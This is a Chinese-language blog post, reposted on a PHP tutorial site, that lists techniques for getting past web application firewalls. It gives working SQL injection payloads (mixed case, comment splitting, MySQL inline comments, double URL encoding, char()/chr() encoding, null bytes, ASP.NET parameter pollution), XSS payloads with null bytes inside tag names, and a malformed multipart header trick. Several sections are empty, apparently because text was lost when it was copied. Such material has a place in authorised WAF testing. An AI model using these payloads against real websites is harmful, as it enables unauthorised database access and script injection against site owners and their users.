浅谈WAF绕过 - 网站安全 - 自学php

因工作原因研究了几天WAF绕过，简单分享下WAF绕过思路。

对一些攻击特征串进行不同的编码，如：URL编码，ASCII，Unicode.使用一些非标准的编码很容易就造成WAF BYPASS.

一些字符非标准的unicode码：

用NULL对数据截断，经测试发现，灵活使用NULL字节可以有效避开配置为阻止包含已知攻击字符串的请求的WAF。

有时，把使用GET方法的攻击转换成使用POST方法的攻击可能会避开某些过滤。许多应用程序在整个应用程序中执行某正常规过滤，阻止已知的攻击字符串。如果一个应用程序希望收到使用GET方法的请求，它能之对URL查询字符串执行这种过滤。将请求转换为使用POST就可以完全避开这种过滤。

看一个在没有正确解析HTTP Request数据包导致的WAF绕过，触发一个XSS：

–0000–

Content-Disposition: form-data; name=x’;filename=]‘;name=payload;]

–0000–

正常的HTTP应该是如下：

–0000–

Content-Disposition: form-data; name=]upfile]; filename=]payload]

–0000–

对比上面俩个HTTP头，给我们提供了WAF绕过的思路，修改攻击特征串或HTTP中的一细节，让WAF无法解析或者解析错误导致绕过。（许多WAF对无法解析的HTTP头，默认直接BYPASS）

罗列了一小部分的基本的绕过技巧（许多技巧因与工作相关无法分享，望见谅～^_^）。

这些技巧不一定能成功绕过WAF，但在许多场合下，通过一些基本技巧组合的使用，能提高绕过WAF的成功率，甚至完全BYPASS。

Sql Injection Bypass

大小写变种：

UnIon/**/sElEcT/**/1,2,3/**/fRoM/**/Users–

使用注释：

如上。在MySql中使用类似如下攻击依然有效：

‘/**/UN/**/ION/**/SEL/**/ECT/**/1,2,3/**/FROM/table–

内联内容(MySql Only)：

/*!UnIoN*/SeLecT+1,2,3–

/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()–

嵌套表达式：

UNunionION+SEselectLECT+1,2,3–

编码：

2次URL编码：

%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users–

ASCII:

[SELECT] ASCII Encode in databases.

MySql: char(83,69,76,69,67,84)

Oracle: chr(83)||chr(69)||chr(76)||chr(69)||chr(67)||chr(84)

Ms-Sql: char(chr(83)+chr(69)+chr(76)+chr(69)+chr(67)+chr(84))

使用空字节： HdhCmsTest2cto测试数据

%00′ union+select+1,2,3–

uni%0bon+se%0blect+1,2,3–

参数污染（ASP/ASP.NET）：

id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

XSS Bypass：

脚本标签：

脚本伪协议：

标签名称：

<[%00]img onerror=alert(1) scr=a>

<i[%00]mg onerror=alert(1) scr=a>

对标签名陈稍做修改，可以避开仅仅阻止特定标签名陈的过滤：

查看更多关于浅谈WAF绕过 - 网站安全 - 自学php的详细内容...

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did14518

更新时间：2022-09-13 阅读：47次